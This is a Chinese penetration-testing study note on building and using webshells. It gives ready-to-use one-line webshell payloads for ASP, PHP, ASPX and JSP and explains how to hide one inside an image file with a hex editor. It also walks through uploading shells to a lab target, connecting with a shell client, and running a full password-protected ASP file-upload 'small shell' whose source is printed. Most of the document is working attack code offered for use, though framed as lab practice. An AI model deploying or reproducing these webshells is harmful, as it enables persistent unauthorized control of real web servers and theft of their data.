20、渗透测试笔记_webshell制作_20191114
1、webshell种类
- 一句话木马
- 小马
- 大马
- 打包马
- 脱裤马
- 等等
2、一句话木马
2.1、介绍
-
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用
-
<%excute request("value")%>
2.2、工作原理
-
黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:
-
<%excute request("value")%>
-
其中value是值,所以你可以更改自己的值,前面的request就是获取这个值
-
<%eval request(“value”)%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的使用)
-
当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell(不知道数据库也可以,只要知道<%eval request(“value”)%>这个文件被插入到哪一个ASP文件里面就可以了)
-
这就被称为一句话木马,他是基于B/S架构的
2.3、常见写法
-
asp一句话木马:
<%eval request("c")%>
-
php一句话木马:
<?php @eval($_POST[value]);?>
-
aspx一句话木马:
<%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%>
-
jsp一句话木马:
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
3、小马&大马
3.1、介绍
- 小马体积小,容易隐藏,隐蔽性强,最重要在于与图片结合一起上传之后可以利用nginx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传等功能
- 大马体积比较大,一般50k以上,功能也多,一半都包括提权命令,磁盘管理,数据库连接接口,执行命令甚至有些已具备自带提权功能和压缩,解压缩网站程序的功能。这种马隐蔽性不好,而大多代码如不加密的话很多杀毒厂商开始追杀此类程序
3.2、使用
-
小马的使用
主要用来上传大马
-
大马的使用
提权、打包、脱裤、增删文件等
4、一句话木马的制作和上传
-
去百度找一张图片(尽量看起来像服务器网站后台的图片)
-
打开C32Asm工具
3.将图片拖进工具中,选择以16进制打开 -
拉到最下方,将一句话木马复制进图片中(可以多复制几种asp、php)
-
制作完成后即可开始使用
-
启动靶机的phpstudy,将制作好的木马放入网站根目录下,并将其名字改为a.php
-
右键文件属性–>点击安全–>点击添加–>输入个对象名称–>确定
-
点击everyone,将权限全部勾选,点击确定
-
使用攻击机访问此文件路径
-
打开菜刀进行连接,密码为1 (如果菜刀连接不成功可以换一张图片重新制作,大部分是选取的图片的问题)
5、小马的使用–上传大马
-
将小马复制进入靶机web目录下,小马内容如下:
<% on error resume next %> <% if request("pass")="g" then '在这修改密码 session("pw")="go" end if %> <%if session("pw")<>"go" then %> <%="<center><br><form action='' method='post'>"%> <%="<input name='pass' type='password' size='10'> <input "%><%="type='submit' value='用力插进去'></center>"%> <%else%> <% set fso=server.createobject("scripting.filesystemobject") path=request("path") if path<>"" then data=request("da") set da=fso.createtextfile(path,true) da.write data if err=0 then %> <%="yes"%> <%else%> <%="no"%> <% end if err.clear end if da.close %> <%set da=nothing%> <%set fos=nothing%> <%="<form action='' method=post>"%> <%="<input type=text name=path>"%> <%="<br>"%> <%="当前文件路径:"&server.mappath(request.servervariables("script_name"))%> <%="<br>"%> <%="操作系统为:"&Request.ServerVariables("OS")%> <%="<br>"%> <%="WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")%> <%="<br>"%> <%="服务器的IP为:"&Request.ServerVariables("LOCAL_ADDR")%> <%="<br>"%> <%=""%> <%="<textarea name=da cols=50 rows=10 width=30></textarea>"%> <%="<br>"%> <%="<input type=submit value=save>"%> <%="</form>"%> <%end if%>
-
将x.asp复制到靶机
-
右键文件属性–>点击安全–>点击添加–>输入个对象名称–>确定
-
点击everyone,将权限全部勾选,点击确定
-
访问目标地址,密码为g进入
-
进入界面后,第一个输入框输入路径,并且给大马起个名字:C:\web2.asp\xx.asp,第二个输入框输入大马(大马可以下方评论留言)
点击save上传成功界面为 -
访问新的上传的大马
-
输入密码为cc2789,进入以下界面为成功
6、文件包含马
-
木马文件内容为,引号内容为,要进行包含的木马
-
访问文件包含马路径
-
输入密码为cc2789,进入以下界面为成功